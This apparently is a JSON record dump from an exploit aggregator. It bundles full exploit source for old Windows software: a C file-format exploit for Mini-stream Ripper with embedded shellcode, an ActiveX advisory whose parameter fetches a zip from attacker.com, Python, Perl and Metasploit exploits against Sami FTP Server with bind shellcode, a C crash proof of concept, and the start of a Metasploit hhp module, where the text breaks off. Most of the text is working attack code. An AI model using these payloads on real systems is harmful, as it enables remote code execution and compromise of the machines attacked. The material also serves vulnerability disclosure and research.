46\\x55\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4a\\x56\\x4b\\x4c\\x4d\\x4e\\x4e\\x4f\\x4b\\x53\\x42\\x45\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x4f\\x35\\x49\\x48\\x45\\x4e\\x48\\x56\\x41\\x48\\x4d\\x4e\\x4a\\x50\"\r\n\"\\x44\\x30\\x45\\x55\\x4c\\x46\\x44\\x50\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x49\\x4d\"\r\n\"\\x49\\x50\\x45\\x4f\\x4d\\x4a\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x43\\x45\\x43\\x45\"\r\n\"\\x43\\x55\\x43\\x55\\x43\\x45\\x43\\x34\\x43\\x45\\x43\\x34\\x43\\x35\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x48\\x56\\x4a\\x56\\x41\\x41\\x4e\\x35\\x48\\x36\\x43\\x35\\x49\\x38\"\r\n\"\\x41\\x4e\\x45\\x49\\x4a\\x46\\x46\\x4a\\x4c\\x51\\x42\\x57\\x47\\x4c\\x47\\x55\"\r\n\"\\x4f\\x4f\\x48\\x4d\\x4c\\x36\\x42\\x31\\x41\\x45\\x45\\x35\\x4f\\x4f\\x42\\x4d\"\r\n\"\\x4a\\x36\\x46\\x4a\\x4d\\x4a\\x50\\x42\\x49\\x4e\\x47\\x55\\x4f\\x4f\\x48\\x4d\"\r\n\"\\x43\\x35\\x45\\x35\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x45\\x4e\\x49\\x44\\x48\\x38\"\r\n\"\\x49\\x54\\x47\\x55\\x4f\\x4f\\x48\\x4d\\x42\\x55\\x46\\x35\\x46\\x45\\x45\\x35\"\r\n\"\\x4f\\x4f\\x42\\x4d\\x43\\x49\\x4a\\x56\\x47\\x4e\\x49\\x37\\x48\\x4c\\x49\\x37\"\r\n\"\\x47\\x45\\x4f\\x4f\\x48\\x4d\\x45\\x55\\x4f\\x4f\\x42\\x4d\\x48\\x36\\x4c\\x56\"\r\n\"\\x46\\x46\\x48\\x36\\x4a\\x46\\x43\\x56\\x4d\\x56\\x49\\x38\\x45\\x4e\\x4c\\x56\"\r\n\"\\x42\\x55\\x49\\x55\\x49\\x52\\x4e\\x4c\\x49\\x48\\x47\\x4e\\x4c\\x36\\x46\\x54\"\r\n\"\\x49\\x58\\x44\\x4e\\x41\\x43\\x42\\x4c\\x43\\x4f\\x4c\\x4a\\x50\\x4f\\x44\\x54\"\r\n\"\\x4d\\x32\\x50\\x4f\\x44\\x54\\x4e\\x52\\x43\\x49\\x4d\\x58\\x4c\\x47\\x4a\\x53\"\r\n\"\\x4b\\x4a\\x4b\\x4a\\x4b\\x4a\\x4a\\x46\\x44\\x57\\x50\\x4f\\x43\\x4b\\x48\\x51\"\r\n\"\\x4f\\x4f\\x45\\x57\\x46\\x54\\x4f\\x4f\\x48\\x4d\\x4b\\x45\\x47\\x35\\x44\\x35\"\r\n\"\\x41\\x35\\x41\\x55\\x41\\x35\\x4c\\x46\\x41\\x50\\x41\\x35\\x41\\x45\\x45\\x35\"\r\n\"\\x41\\x45\\x4f\\x4f\\x42\\x4d\\x4a\\x56\\x4d\\x4a\\x49\\x4d\\x45\\x30\\x50\\x4c\"\r\n\"\\x43\\x35\\x4f\\x4f\\x48\\x4d\\x4c\\x56\\x4f\\x4f\\x4f\\x4f\\x47\\x33\\x4f\\x4f\"\r\n\"\\x42\\x4d\\x4b\\x58\\x47\\x45\\x4e\\x4
f\\x43\\x38\\x46\\x4c\\x46\\x36\\x4f\\x4f\"\r\n\"\\x48\\x4d\\x44\\x55\\x4f\\x4f\\x42\\x4d\\x4a\\x36\\x4f\\x4e\\x50\\x4c\\x42\\x4e\"\r\n\"\\x42\\x36\\x43\\x55\\x4f\\x4f\\x48\\x4d\\x4f\\x4f\\x42\\x4d\\x5a\";\r\n \r\nint main ( int argc , char * argv[])\r\n{\r\n FILE* expfle= NULL;\r\n char* EIP = \"\\x53\\x93\\x42\\x7e\"; // jmp esp -> user32.dll\r\n int i;\r\n \r\n printf(\"\\t. .. ... Mini-stream Ripper (.pls) Stack buffer Overflow Exploit ... .. .\\r\\n\");\r\n printf(\"\\t -------> now upload the .pls file to a remote server <-------\\n\");\r\n \r\n \r\n if( (expfle=fopen(\"mini-stream-ripper.pls\",\"wb\")) ==NULL )\r\n {\r\n perror(\"Cannot create the exploit file!!! :(\");\r\n exit(0);\r\n }\r\n \r\n for (i=0; i<17405; i++)\r\n {\r\n fwrite(\"\\x41\", 1, 1, expfle); // Junk\r\n }\r\n \r\n fwrite(EIP, 4, 1, expfle); // ret\r\n \r\n for (i=0; i<10; i++)\r\n {\r\n fwrite(\"\\x90\", 1, 1, expfle); // Nop's\r\n }\r\n \r\n fwrite(shell, sizeof(shell), 1, expfle); // write the shell\r\n \r\n for (i=0; i<16702; i++)\r\n {\r\n fwrite(\"\\xcc\", 1, 1, expfle); // finish off buffer\r\n }\r\n \r\n fclose(expfle);\r\n \r\n printf(\"[+] mini-stream-ripper.pls Created successfully! 
\\r\\n\");\r\n printf(\"[+] Exploited by mr_me \\r\\n\");\r\n \r\n return 0;\r\n \r\n}\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/8215"}, {"lastseen": "2018-01-09T13:11:30", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category remote exploits", "modified": "2008-04-07T00:00:00", "published": "2008-04-07T00:00:00", "id": "1337DAY-ID-9179", "href": "https://0day.today/exploit/description/9179", "type": "zdt", "title": "CDNetworks Nefficient Download (NeffyLauncher.dll) Code Execution Vuln", "sourceData": "======================================================================\r\nCDNetworks Nefficient Download (NeffyLauncher.dll) Code Execution Vuln\r\n======================================================================\r\n\r\nTitle: CDNetworks Nefficient Download(NeffyLauncher.dll) Vulnerabilities\r\nAuthor: Simon Ryeo(bar4mi (at) gmail.com, barami (at) ahnlab.com)\r\nSeverity: High\r\nImpact: Remote Code Execution\r\nVulnerable Systems: MS Windows Systems\r\nVersion: NeffyLauncher 1.0.5 {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C}\r\nSolution: Upgrade the vendor's patch\r\nVendor's Homepage: http://www.cdnetworks.com\r\nReference: How to stop an ActiveX control from running in Internet Explorer\r\n http://support.microsoft.com/kb/240797/ko\r\n http://support.microsoft.com/kb/240797/en-us\r\nHistory:\r\n - 02.27.2008: Initiate notify\r\n - 03.06.2008: The vendor patched\r\n - After: The vendor are applying the patch to their customers.\r\n\r\nDescription:\r\nNeffycient Download is a ActiveX control used to download and to upgrade\r\nsuch as game install files through HTTP, FTP, etc. 
It has two\r\nvulnerabilities.\r\n1st, a attacker can copy a malicious file to any path such as start program\r\nfolder(C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup).\r\n2nd, a attacker can issue keycodes which are used to restrict execution on\r\nother domains.\r\n\r\nObject:\r\nI notify this vulnerability not to promote abnormal uses but to make\r\na software more secure. This vulnerability was patched by the vendor's\r\npositive effort. I hope this information helps many people who try\r\nto study security and to develop an application.\r\n\r\n1. Remote Code Execution\r\nFirst of all, we must have write permission on a board in a web site used\r\nthis ActiveX or obtain a valid keycode which is correct to your site.\r\nAn Attacker who has a valid keycode can make a expolit by modifying\r\nHttpSkin,\r\nSkinPath's values. Malicious files which is on attacker's site must\r\nbe compressed as ZIP file.\r\nFor instance. The below modification copies abnormal files to Windows's\r\nroot directory.\r\n<PARAM NAME=\"HttpSkin\" VALUE=\"http://www.attacker.com/maliciousFiles.zip\">\r\n<PARAM NAME=\"SkinPath\" VALUE=\"../../../../\">\r\n\r\nIn this way an attacker can modify SkinPath's value to All Users's Start\r\nProgram Folder. Then he can execute his malicious program when the user\r\nrestarts his computer.\r\n\r\n2. Generating a KeyCode Value\r\nAn attacker can make the keycode generator by debugging this ActiveX\r\ncontrol. A keycode's value has two meaning. First two digits represent\r\nthe domain's length(hexadecimal).\r\nNext five(or more) digits are valuable numbers to calculate a domain.\r\nThe keycode check the procedure of this ActiveX control likes below.\r\nIt calculates the keycode's value and returns four bytes as a result.\r\nNext it starts the domain's calculation and returns four bytes.\r\nFinally, it compares with these four bytes to check whether the site is\r\nvalid.\r\nI made a PoC using inline assembly and C. 
But it doesn't open to the public\r\nbecause of the vendor's request. (Just refer above descriptions.)\r\n\r\n\r\n\n# 0day.today [2018-01-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/9179"}], "cve": [{"lastseen": "2019-12-07T12:53:45", "bulletinFamily": "NVD", "description": "Integard Pro 2.2.0.9026 allows remote attackers to execute arbitrary code via a buffer overflow involving a long NoJs parameter to the /LoginAdmin URI.", "modified": "2019-12-06T18:15:00", "id": "CVE-2019-16702", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-16702", "published": "2019-09-23T03:15:00", "title": "CVE-2019-16702", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-11-01T17:29:56", "bulletinFamily": "exploit", "description": "KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH). CVE-2006-0441. Remote exploit for Windows platform", "modified": "2016-11-01T00:00:00", "published": "2016-11-01T00:00:00", "id": "EDB-ID:40675", "href": "https://www.exploit-db.com/exploits/40675/", "type": "exploitdb", "title": "KarjaSoft Sami FTP Server 2.0.2 - USER/PASS Remote Buffer Overflow (SEH)", "sourceData": "#/usr/bin/python\r\n#-*- Coding: utf-8 -*-\r\n\r\n### Sami FTP Server 2.0.2- SEH Overwrite, Buffer Overflow by n30m1nd ### \r\n\r\n# Date: 2016-01-11\r\n# Exploit Author: n30m1nd\r\n# Vendor Homepage: http://www.karjasoft.com/\r\n# Software Link: http://www.karjasoft.com/files/samiftp/samiftpd_install.exe\r\n# Version: 2.0.2\r\n# Tested on: Win7 64bit and Win10 64 bit\r\n\r\n# Credits\r\n# =======\r\n# Thanks to PHRACK for maintaining all the articles up for so much time... 
\r\n# These are priceless and still current for exploit development!!\r\n# Shouts to the crew at Offensive Security for their huge efforts on making\tthe infosec community better\r\n\r\n# How to\r\n# ======\r\n# * Open Sami FTP Server and open its graphical interface\r\n# * Run this python script and write the IP to attack\r\n# * Connect to the same IP on port 4444\r\n#\r\n# BONUS\r\n# =====\r\n# Since the program will write the data into its (SamiFTP.binlog) logs it will try to load these logs on each\r\n# start and so, it will crash and run our shellcode everytime it starts.\r\n\r\n# Why?\r\n# ====\r\n# The graphical interface tries to show the user name which produces an overflow overwriting SEH\r\n\r\n# Exploit code\r\n# ============\r\n\r\nimport socket\r\nimport struct\r\n\r\ndef doHavoc(ipaddr):\r\n # Bad chars: 00 0d 0a ff\r\n alignment = \"\\x90\"*3\r\n \r\n jmpfront = \"345A7504\".decode('hex')\r\n #CPU Disasm\r\n #Hex dump Command \r\n # 34 5A XOR AL,5A\r\n # 75 04 JNE SHORT +04\r\n \r\n # pop pop ret in tmp01.dll\r\n popret = 0x10022ADE\r\n \r\n # fstenv trick to get eip: phrack number 62\r\n # and store it into EAX for the metasploit shell (BufferRegister)\r\n getEIPinEAX = \"D9EED934E48B44E40C040b\".decode('hex')\r\n #CPU Disasm\r\n #Hex dump Command\r\n # D9EE FLDZ\r\n # D934E4 FSTENV SS:[ESP]\r\n # 8B44E4 0C MOV EAX,DWORD PTR SS:[ESP+0C]\r\n # 04 0B ADD AL,0B\r\n\r\n # Bind shellcode on port 4444 - alpha mixed BufferRegister=EAX\r\n shellcode = (\r\n getEIPinEAX + \r\n \"PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylm8mRS0UP7p\"\r\n \"e0K9jEDqYPU4Nk60VPlKCbdLnkbrWdLKqb4hfoNWczEvdqyoNLElpaalC2dl10kq\"\r\n \"xO6mEQ9WxbjRf22wNkf220lKsz5lNkblr1sHxcsxGqZqcaLK0YQ05QiCNkCyB8Hc\"\r\n \"VZ1Ynk5dlKEQyF01IoNLYQHOvm31yW6X9pRUXvwsSMIhgKqmDdT5KTf8NkaHWTEQ\"\r\n \"yCavNkDLBklKbx7lgqN3nkC4nkuQXPk9w47Tq4skaKsQV9pZPQkOYpcosobzNkWb\"\r\n \"8kNmSmbH5cP2C0Wpu8Qgd3UbCof4e80LD7ev379oyElxlP31GpWpFIo4V4bpCXa9\"\r\n 
\"op2KePyohURJFhPY0P8bimw0pPG0rpu8xjDOYOipYoiEj7QxWrC0wa3lmYZFbJDP\"\r\n \"qFqGCXYRIKDw3WkOZuv7CXNWkYehKOkOiEaGPhD4HlwKm1KOhUQGJ7BHRUpnrmqq\"\r\n \"Iokee83S2McT30oyXcQGV767FQIfcZfrv9PVYrImQvKwG4DdelvaGqLM0D5tDPO6\"\r\n \"GpRd0T602vaFF6w666rnqFsf2sPV0h2YzleoovYoXUK9kPrnSfPFYo00Ph7xk7wm\"\r\n \"sPYoKeMkxplulb2vsXoVmEOMomKO9EgL4FCLFjk0YkM0qec5Mkg7FsD2ROqzGpv3\"\r\n \"ioJuAA\"\r\n )\r\n \r\n # Final payload, SEH overwrite ocurrs at 600 bytes\r\n payload = alignment + \".\"*(600-len(alignment)-len(jmpfront)) + jmpfront + struct.pack(\"<L\", popret) + shellcode\r\n try:\r\n s = socket.create_connection((ipaddr, 21))\r\n s.send(\"USER \"+ payload +\"\\r\\n\" )\r\n print s.recv(4096)\r\n \r\n s.send(\"PASS \"+ payload +\"\\r\\n\" )\r\n print s.recv(4096)\r\n print s.recv(4096)\r\n except e:\r\n print str(e)\r\n exit(\"[+] Couldn't connect\")\r\n \r\nif __name__ == \"__main__\":\r\n ipaddr = raw_input(\"[+] IP: \")\r\n doHavoc(ipaddr)\r\n while raw_input(\"[?] Got shell?(y/n) \").lower() == \"n\":\r\n doHavoc(ipaddr)\r\n print \"[+] Enjoy...\"", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40675/"}, {"lastseen": "2016-02-02T06:18:19", "bulletinFamily": "exploit", "description": "KarjaSoft Sami FTP Server v2.02 USER Overflow. CVE-2006-0441,CVE-2006-2212. Remote exploit for windows platform", "modified": "2010-04-30T00:00:00", "published": "2010-04-30T00:00:00", "id": "EDB-ID:16702", "href": "https://www.exploit-db.com/exploits/16702/", "type": "exploitdb", "title": "KarjaSoft Sami FTP Server 2.02 - USER Overflow", "sourceData": "##\r\n# $Id: sami_ftpd_user.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name'\t\t=> 'KarjaSoft Sami FTP Server v2.02 USER Overflow',\r\n\t\t\t'Description'\t=> %q{\r\n\t\t\t\t\tThis module exploits the KarjaSoft Sami FTP Server version 2.02\r\n\t\t\t\tby sending an excessively long USER string. The stack is overwritten\r\n\t\t\t\twhen the administrator attempts to view the FTP logs. Therefore, this exploit\r\n\t\t\t\tis passive and requires end-user interaction. Keep this in mind when selecting\r\n\t\t\t\tpayloads. When the server is restarted, it will re-execute the exploit until\r\n\t\t\t\tthe logfile is manually deleted via the file system.\r\n\t\t\t},\r\n\t\t\t'Author'\t=> [ 'patrick' ],\r\n\t\t\t'Arch'\t\t=> [ ARCH_X86 ],\r\n\t\t\t'License'\t=> MSF_LICENSE,\r\n\t\t\t'Version'\t=> '$Revision: 9179 $',\r\n\t\t\t'Stance'\t=> Msf::Exploit::Stance::Passive,\r\n\t\t\t'References'\t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t# This exploit appears to have been reported multiple times.\r\n\t\t\t\t\t[ 'CVE', '2006-0441'],\r\n\t\t\t\t\t[ 'CVE', '2006-2212'],\r\n\t\t\t\t\t[ 'OSVDB', '25670'],\r\n\t\t\t\t\t[ 'BID', '16370'],\r\n\t\t\t\t\t[ 'BID', '22045'],\r\n\t\t\t\t\t[ 'BID', '17835'],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/1448'],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/1452'],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/1462'],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/3127'],\r\n\t\t\t\t\t[ 'URL', 'http://www.milw0rm.com/exploits/3140'],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'seh',\r\n\t\t\t\t},\r\n\t\t\t'Platform' \t=> ['win'],\r\n\t\t\t'Privileged'\t=> 
false,\r\n\t\t\t'Payload'\t=>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space'\t\t\t=> 300,\r\n\t\t\t\t\t'BadChars'\t\t=> \"\\x00\\x0a\\x0d\\x20\\xff\",\r\n\t\t\t\t\t'StackAdjustment'\t=> -3500,\r\n\t\t\t\t},\r\n\t\t\t'Targets' \t=>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll\r\n\t\t\t\t\t[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd11a9 } ], # p/p/r ws2help.dll\r\n\t\t\t\t\t[ 'Windows 2000 Pro All - French', { 'Ret' => 0x74fa12bc } ], # p/p/r ws2help.dll\r\n\t\t\t\t\t[ 'Windows XP SP0/1 - English', { 'Ret' => 0x71aa32ad } ], # p/p/r ws2help.dll\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Jan 24 2006'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(21),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef check\r\n\t\tconnect\r\n\t\tbanner = sock.get(-1,3)\r\n\t\tdisconnect\r\n\r\n\t\tif (banner =~ /Sami FTP Server 2.0.2/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\tsploit = Rex::Text.rand_text_alphanumeric(596) + generate_seh_payload(target.ret)\r\n\r\n\t\tlogin = \"USER #{sploit}\\r\\n\"\r\n\t\tlogin << \"PASS \" + Rex::Text.rand_char(payload_badchars)\r\n\r\n\t\tsock.put(login + \"\\r\\n\")\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16702/"}, {"lastseen": "2016-01-31T17:49:32", "bulletinFamily": "exploit", "description": "Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow Exploit. CVE-2006-0441. 
Remote exploit for windows platform", "modified": "2007-01-17T00:00:00", "published": "2007-01-17T00:00:00", "id": "EDB-ID:3140", "href": "https://www.exploit-db.com/exploits/3140/", "type": "exploitdb", "title": "Sami FTP Server 2.0.2 USER/PASS Remote Buffer Overflow Exploit", "sourceData": "#!/usr/bin/perl\r\n#\t\tExploit for SAMI FTP version 2.0.2\r\n#\t\tUSER/PASS BUFFER OVERFLOW ARBITARY REMOTE CODE EXECUTION (CALC.exe) \r\n#\t\tYou can put you own shellcode to spawn a shell\r\n#\t\tThrusday 17th Jan 2007\r\n#\t\tTested on : Windows 2000 SP4 (Use your own return address for other flavors)\t\t\r\n#\t\t\r\n#\t\t\t\t\r\n#\t\t\r\n#\t\tCoded by UmZ! umz32.dll@gmail.com\r\n#\t\tOn behalf of : Secure Bytes Inc.\r\n#\t\thttp://www.secure-bytes.com/exploits/\r\n#\t\r\n#\r\n#\t\r\n#\t Special Thanks to Ahmad Tauqeer, Ali Shuja and Uquali\r\n#\r\n#\r\n#\t Disclaimer: This Proof of concept exploit is for educational purpose only.\r\n#\t\t Please do not use it against any system without prior permission.\r\n# \t\tYou are responsible for yourself for what you do with this code.\r\n#\r\n#\r\n#\t Note:\tAfter executing the exploit You will get \"Cannot login User or password not correct.\"\r\n#\t\t\tThat doesn't mean exploit failed whenever you click on Sami FTP server it will crash \r\n#\t\t\tresulting in the execution of calc.exe and will execute whenever the SAMI FTP server \r\n#\t\t\trestarts until it is reinstalled.\r\n\r\n\r\nuse Net::FTP;\r\n\r\n\r\nprint \"Coded by UmZ! 
umz32.dll@gmail.com\\n\";\r\nprint \"http://www.secure-bytes.com/exploits/\\n\";\r\n\t\r\n$ftp = Net::FTP->new(\"192.168.100.250\", Debug => 0) or die \"Cannot connect : $@\";\r\n\r\nmy $msg =\"\\x90\" x596; #140\r\nmy $msg2 =\"B\"x484;\r\nmy $shellcode = \"\\x31\\xc9\\x83\\xe9\\xdb\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xd8\".\r\n\t\t \"\\x22\\x72\\xe4\\x83\\xeb\\xfc\\xe2\\xf4\\x24\\xca\\x34\\xe4\\xd8\\x22\\xf9\\xa1\".\r\n\t\t \"\\xe4\\xa9\\x0e\\xe1\\xa0\\x23\\x9d\\x6f\\x97\\x3a\\xf9\\xbb\\xf8\\x23\\x99\\x07\".\r\n\t\t \"\\xf6\\x6b\\xf9\\xd0\\x53\\x23\\x9c\\xd5\\x18\\xbb\\xde\\x60\\x18\\x56\\x75\\x25\".\r\n\t\t \"\\x12\\x2f\\x73\\x26\\x33\\xd6\\x49\\xb0\\xfc\\x26\\x07\\x07\\x53\\x7d\\x56\\xe5\".\r\n\t\t \"\\x33\\x44\\xf9\\xe8\\x93\\xa9\\x2d\\xf8\\xd9\\xc9\\xf9\\xf8\\x53\\x23\\x99\\x6d\".\r\n\t\t \"\\x84\\x06\\x76\\x27\\xe9\\xe2\\x16\\x6f\\x98\\x12\\xf7\\x24\\xa0\\x2d\\xf9\\xa4\".\r\n\t\t \"\\xd4\\xa9\\x02\\xf8\\x75\\xa9\\x1a\\xec\\x31\\x29\\x72\\xe4\\xd8\\xa9\\x32\\xd0\".\r\n\t\t \"\\xdd\\x5e\\x72\\xe4\\xd8\\xa9\\x1a\\xd8\\x87\\x13\\x84\\x84\\x8e\\xc9\\x7f\\x8c\".\r\n\t\t \"\\x28\\xa8\\x76\\xbb\\xb0\\xba\\x8c\\x6e\\xd6\\x75\\x8d\\x03\\x30\\xcc\\x8d\\x1b\".\r\n\t\t \"\\x27\\x41\\x13\\x88\\xbb\\x0c\\x17\\x9c\\xbd\\x22\\x72\\xe4\";\r\n\r\nmy $test= \"\\x90\" x 108;\r\n\r\nmy $msg1=$msg. \"\\x70\\xFD\\x8B\\x01\".\"\\x96\\x64\\xF8\\x77\". $test . $shellcode. \"\\r\\n\";\r\n\r\n$ftp->login($msg1.\"\\r\\n\\0\",\"umz\") or die \"Cannot login \", $ftp->message;\r\n\r\n$ftp->quit;\r\n\r\n# milw0rm.com [2007-01-17]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3140/"}, {"lastseen": "2016-01-31T17:48:00", "bulletinFamily": "exploit", "description": "Sami FTP Server 2.0.2 (USER/PASS) Remote Buffer Overflow PoC. CVE-2006-0441. 
Dos exploit for windows platform", "modified": "2007-01-14T00:00:00", "published": "2007-01-14T00:00:00", "id": "EDB-ID:3127", "href": "https://www.exploit-db.com/exploits/3127/", "type": "exploitdb", "title": "Sami FTP Server 2.0.2 USER/PASS Remote Buffer Overflow PoC", "sourceData": "/************************************************************************\r\n*KarjaSoft Sami FTP Server 2.0.2 USER/PASS buffer overflow *\r\n* *\r\n*Sending a long USER / PASS request to server triggers the vulnerability*\r\n*EAX and EDX are owned leading to code execution *\r\n*This is only a POC *\r\n*Thanks to rewterz and Muhammad Ahmed Siddiqui for discovery *\r\n* *\r\n*Usage: sami.exe ip port *\r\n* *\r\n*Coded by Marsu <Marsupilamipowa@hotmail.fr> *\r\n************************************************************************/\r\n\r\n#include \"winsock2.h\"\r\n#include \"stdio.h\"\r\n#include \"stdlib.h\"\r\n#pragma comment(lib, \"ws2_32.lib\")\r\n\r\nint main(int argc, char* argv[])\r\n{\r\n\tstruct hostent *he;\r\n\tstruct sockaddr_in sock_addr;\r\n\tWSADATA wsa;\r\n\tint ftpsock;\r\n\tchar recvbuff[1024];\r\n\tchar evilbuff[1024];\r\n\tint buflen=600;// 650 will kill the app. 600 just call the debugger\r\n\r\n\tif (argc!=3)\r\n\t{\r\n\t\tprintf(\"[+] Usage: %s <ip> <port>\\n\",argv[0]);\r\n\t\treturn 1;\r\n\t}\r\n\tWSACleanup();\r\n\tWSAStartup(MAKEWORD(2,0),&wsa);\r\n\r\n\tprintf(\"[+] Connecting to %s:%s ... 
\",argv[1],argv[2]);\r\n\tif ((he=gethostbyname(argv[1])) == NULL) {\r\n\t\tprintf(\"Failed\\n[-] Could not init gethostbyname\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\tif ((ftpsock = socket(PF_INET, SOCK_STREAM, 0)) == -1) {\r\n\t\tprintf(\"Failed\\n[-] Socket error\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\r\n\tsock_addr.sin_family = PF_INET;\r\n\tsock_addr.sin_port = htons(atoi(argv[2]));\r\n\tsock_addr.sin_addr = *((struct in_addr *)he->h_addr);\r\n\tmemset(&(sock_addr.sin_zero), '\\0', 8);\r\n\tif (connect(ftpsock, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {\r\n\t\tprintf(\"Failed\\n[-] Sorry, cannot connect to %s:%s. Error: %i\\n\", argv[1],argv[2],WSAGetLastError());\r\n\t\treturn 1;\r\n\t}\r\n\tprintf(\"OK\\n\");\r\n\tmemset(recvbuff,'\\0',1024);\r\n\trecv(ftpsock, recvbuff, 1024, 0);\r\n\r\n\tprintf(\"[+] Building payload ... \");\r\n\tmemset(evilbuff,'A',buflen);\r\n\tmemset(evilbuff+585,'B',4);\t//eax and edx will be 42424262\r\n\tmemcpy(evilbuff,\"USER \",5);\r\n\tmemcpy(evilbuff+buflen,\"\\r\\n\\0\",3);\r\n\tprintf(\"OK\\n[+] Sending USER ... \");\r\n\tif (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {\r\n\t\tprintf(\"Failed\\n[-] Could not send\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\tprintf(\"OK\\n\");\r\n\tmemset(recvbuff,'\\0',1024);\r\n\trecv(ftpsock, recvbuff, 1024, 0);\r\n\r\n\tmemcpy(evilbuff,\"PASS \",5);\r\n\tprintf(\"[+] Sending PASS ... 
\");\r\n\tif (send(ftpsock,evilbuff,strlen(evilbuff),0)==-1) {\r\n\t\tprintf(\"Failed\\n[-] Could not send\\n\");\r\n\t\treturn 1;\r\n\t}\r\n\tprintf(\"OK\\n\");\r\n\trecv(ftpsock, recvbuff, 1024, 0);\r\n\r\n\tprintf(\"[+] Host should be down\\n\");\r\n\treturn 0;\r\n}\r\n\r\n// milw0rm.com [2007-01-14]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3127/"}], "metasploit": [{"lastseen": "2019-12-03T19:14:40", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in HTML Help Workshop 4.74 by creating a specially crafted hhp file.\n", "modified": "2017-07-24T13:26:21", "published": "2009-12-08T20:20:30", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/HHW_HHP_CONTENTFILE_BOF", "href": "", "type": "metasploit", "title": "HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Egghunter\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HTML Help Workshop 4.74 (hhp Project File) Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in HTML Help Workshop 4.74\n by creating a specially crafted hhp file.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'bratax', 'jduck' ],\n 'References' =>\n [\n [ 'CVE', '2006-0564' ],\n [ 'OSVDB', '22941' ],\n [ 'EDB', '1470' ],\n [ 'EDB', '1495' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'DisablePayloadHandler' => true,\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x1a\\x2f\\x5c\",\n 'StackAdjustment' => -4800,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP English SP3', { 'Offset' => 280, 'Ret' => 
